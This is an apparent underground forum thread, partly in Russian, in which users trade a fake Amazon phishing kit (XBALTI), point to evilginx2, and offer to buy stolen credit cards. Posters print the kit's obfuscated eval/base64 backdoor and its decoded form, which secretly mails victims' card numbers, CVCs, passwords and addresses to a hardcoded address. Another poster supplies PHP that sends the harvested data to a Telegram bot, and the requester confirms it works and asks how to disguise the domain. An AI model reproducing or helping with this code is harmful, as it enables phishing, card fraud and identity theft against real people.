do you have fake amazon website? | у вас есть поддельный сайт Amazon?

[jolkha]

Do you have any fake amazon up-to-date template that you're willing to share for free?
Or do you do phishing? if you can phish one email for me (I have access) I will buy CC from you same price as shops

Есть ли у вас какой-нибудь поддельный обновленный шаблон amazon, которым вы готовы поделиться бесплатно?

Или вы занимаетесь фишингом? если вы можете отправить мне одно электронное письмо по электронной почте (у меня есть доступ) Я куплю CC у вас по той же цене, что и в магазинах

 

[Jayson V00rheez]

You can use evilginx2 for phishing

 

[jolkha]

You can use evilginx2 for phishing

Thank you bro!

As you can see I'm a total noob in phishing, but with this reference to evilginx on github I think I can find many resources to learn and be able to make at least one phishing attack

 

[EthicX]

Hello i can share an amazon phishing page that a mf share it on a forum but its backdoored so you need to clean it up, i already found the backdoor

Link : https://anonfiles.com/F6M5H6v5xa/AMZ_2K22_zip

backdoor :

DO NOT USE IT BEFORE YOU CLEAN THE CODE !

 

[jolkha]

Hello i can share an amazon phishing page that a mf share it on a forum but its backdoored so you need to clean it up, i already found the backdoor

Link : https://anonfiles.com/F6M5H6v5xa/AMZ_2K22_zip

backdoor :

Посмотреть вложение 32183


DO NOT USE IT BEFORE YOU CLEAN THE CODE !

Bro thank you big time!
I saw this template out there but I didn't know there's a backdoor.
Do you think this is the only one in the template or there's more?
Thanks

 

[EthicX]

Bro thank you big time!
I saw this template out there but I didn't know there's a backdoor.
Do you think this is the only one in the template or there's more?
Thanks

Yeah i already analayse it , delete that line and you good to go

 

[jolkha]

Yeah i already analayse it , delete that line and you good to go

I changed it to my own and I still don't receive anything. I'm testing on xampp. Is there a manual for XBALTI?

 

[EthicX]

Xampp dont support mail server

 

[jolkha]

Xampp dont support mail server

Oh so that seems to be the problem. Should I try and buy hacked cpanel and test? or has to be speicifc Cpanel?

 

[jolkha]

Xampp dont support mail server

I tried adding the website files on a real website, but still it doesn't send e-mail with results? how do we make it work? thanks

EDIT:

Actually the website not sending the results in to e-mail, but it's there in the /admin section

Hope it helps someone.

 

[EthicX]

I tried adding the website files on a real website, but still it doesn't send e-mail with results? how do we make it work? thanks

EDIT:

Actually the website not sending the results in to e-mail, but it's there in the /admin section

Hope it helps someone.

i would recommend to send data to telegram instead of email its more easy and unlike email you dont need any thing else to receive data

 

[EthicX]

if you like the telegram thing here is a quick code integration that should work with that script

just copy and paste in the same file where the backdoor used to be

$apiToken = "my_bot_api_token"; // change this

$data = [
    'chat_id' => '@yourchannelname', // change this
    'text' => $msg
];

$response = file_get_contents("https://api.telegram.org/bot$apiToken/sendMessage?" . http_build_query($data) );
//

 

[jolkha]

if you like the telegram thing here is a quick code integration that should work with that script

just copy and paste in the same file where the backdoor used to be

$apiToken = "my_bot_api_token"; // change this

$data = [
    'chat_id' => '@yourchannelname', // change this
    'text' => $msg
];

$response = file_get_contents("https://api.telegram.org/bot$apiToken/sendMessage?" . http_build_query($data) );
//

Damn bro you rock! This worked. I made an API/Channel etc. and this actually worked. You are a great man.

 

[ghostmarket09]

backdoor found at the end of these files:

send_billing.php
send_card.php
send_email.php
send_login.php
send_vbv.php

in XBALTI directory


$khraha = fopen("../../admin/rezulta.php", "a");
fwrite($khraha, $msg);
$subject .= "BILLING INFO FROM [".$_SESSION['country']."] [".$_SESSION['_ip_']."]";
$headers .= "From: <XBALTI>";
$headers .= "MIME-Version: 1.0\n";
$headers .= "Content-type: text/html; charset=UTF-8\n";
@mail($Email, $subject, $msg, $headers);
eval(gzinflate(base64_decode('4+JScc1NzMwxVLBVUM8tqjA2N7UwdqhMzEtJrdBLzs9Vt+ZyAMlrQJXpKKgUlyZlpSaXAFm5xelAMiM1MSW1qFjTGgA=')));




Decoded:

$khraha = fopen("../../admin/rezulta.php", "a");
fwrite($khraha, $msg);
$subject .= "BILLING INFO FROM [".$_SESSION['country']."] [".$_SESSION['_ip_']."]";
$headers .= "From: <XBALTI>";
$headers .= "MIME-Version: 1.0\n";
$headers .= "Content-type: text/html; charset=UTF-8\n";
@mail($Email, $subject, $msg, $headers);
$Email1 = 'mrx37583@yandex.com';
@mail($Email1, $subject, $msg, $headers);



What he receives:

$_SESSION['fullname'] = $_POST['fullname'];
$_SESSION['address'] = $_POST['address'];
$_SESSION['City'] = $_POST['City'];
$_SESSION['stat'] = $_POST['stat'];
$_SESSION['zipcode'] = $_POST['zipcode'];
$_SESSION['phonenumber'] = $_POST['phonenumber'];
$_SESSION['dob'] = $_POST['dob'];
$_SESSION['namecard'] = $_POST['namecard'];
$_SESSION['cardnumber'] = $_POST['cardnumber'];
$_SESSION['exdate'] = $_POST['exdate'];
$_SESSION['cvc'] = $_POST['cvc'];
$_SESSION['password'] = $_POST['password'];
$_SESSION['emaill'] = $_POST['emaill'];

 

[jolkha]

backdoor found at the end of these files:

send_billing.php
send_card.php
send_email.php
send_login.php
send_vbv.php

in XBALTI directory


$khraha = fopen("../../admin/rezulta.php", "a");
fwrite($khraha, $msg);
$subject .= "BILLING INFO FROM [".$_SESSION['country']."] [".$_SESSION['_ip_']."]";
$headers .= "From: <XBALTI>";
$headers .= "MIME-Version: 1.0\n";
$headers .= "Content-type: text/html; charset=UTF-8\n";
@mail($Email, $subject, $msg, $headers);
eval(gzinflate(base64_decode('4+JScc1NzMwxVLBVUM8tqjA2N7UwdqhMzEtJrdBLzs9Vt+ZyAMlrQJXpKKgUlyZlpSaXAFm5xelAMiM1MSW1qFjTGgA=')));




Decoded:

$khraha = fopen("../../admin/rezulta.php", "a");
fwrite($khraha, $msg);
$subject .= "BILLING INFO FROM [".$_SESSION['country']."] [".$_SESSION['_ip_']."]";
$headers .= "From: <XBALTI>";
$headers .= "MIME-Version: 1.0\n";
$headers .= "Content-type: text/html; charset=UTF-8\n";
@mail($Email, $subject, $msg, $headers);
$Email1 = 'mrx37583@yandex.com';
@mail($Email1, $subject, $msg, $headers);



What he receives:

$_SESSION['fullname'] = $_POST['fullname'];
$_SESSION['address'] = $_POST['address'];
$_SESSION['City'] = $_POST['City'];
$_SESSION['stat'] = $_POST['stat'];
$_SESSION['zipcode'] = $_POST['zipcode'];
$_SESSION['phonenumber'] = $_POST['phonenumber'];
$_SESSION['dob'] = $_POST['dob'];
$_SESSION['namecard'] = $_POST['namecard'];
$_SESSION['cardnumber'] = $_POST['cardnumber'];
$_SESSION['exdate'] = $_POST['exdate'];
$_SESSION['cvc'] = $_POST['cvc'];
$_SESSION['password'] = $_POST['password'];
$_SESSION['emaill'] = $_POST['emaill'];

Yes thank you for your help! I removed it and added the tg channel update instead

 

[jolkha]

You can use evilginx2 for phishing

I want to make a new attempt at this using evilginx2 but I've got a question - what is the best way way to hide the domain name to amazon?
Thanks